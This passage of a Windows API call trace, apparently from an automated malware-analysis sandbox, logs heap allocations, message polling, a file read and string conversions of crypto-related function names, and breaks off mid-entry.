HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0029.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0029.812] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0029.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0029.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0029.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0029.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0029.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0029.812] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0029.812] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0029.812] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0029.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0029.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0029.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0029.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0029.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0029.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0029.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0029.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0029.813] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0029.813] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x6546, lpOverlapped=0x0) returned 1 [0029.814] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0029.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0029.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0029.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6546) returned 0x8affc0 [0029.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0029.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0029.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0029.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0029.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0029.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0029.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6546) returned 0x8b6510 [0029.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0029.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.815] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0029.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0029.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0029.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6546) returned 0x8affc0 [0029.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0029.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0029.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0029.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.815] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0029.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0029.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0029.815] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0029.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0029.815] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0029.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0029.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0029.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0029.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0029.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0029.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6546) returned 0x8affc0 [0029.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0029.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0029.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0029.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0029.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da378 [0029.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0029.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0029.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0029.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0029.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0029.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0029.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0029.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889490 [0029.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0029.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0029.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0029.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0029.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0029.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6546) returned 0x8bca60 [0029.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0029.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0029.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0029.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0029.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0029.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0029.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0029.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0029.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0029.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0029.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0029.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0029.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0029.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0029.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0029.817] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0029.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0029.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0029.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0029.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0029.817] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0029.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0029.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0029.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0029.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0029.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0029.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0029.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0029.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0029.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0029.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0029.818] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0029.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0029.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0029.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da368 [0029.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0029.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0029.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0029.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0029.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898c8 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0029.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0029.819] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0029.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0029.819] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0029.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0029.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0029.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0029.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0029.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0029.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0029.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0029.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0029.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0029.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0029.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0029.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0029.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0029.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.820] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0029.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0029.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0029.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0029.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0029.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0029.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0029.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0029.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0029.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0029.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0029.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0029.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0029.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0029.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0029.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0029.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0029.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0029.821] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0029.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0029.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0029.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0029.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0029.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0029.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0029.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0029.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0029.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0029.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0029.821] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0029.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c820 [0029.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0029.821] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0029.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0029.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0029.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0029.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0029.821] HeapFree (in: 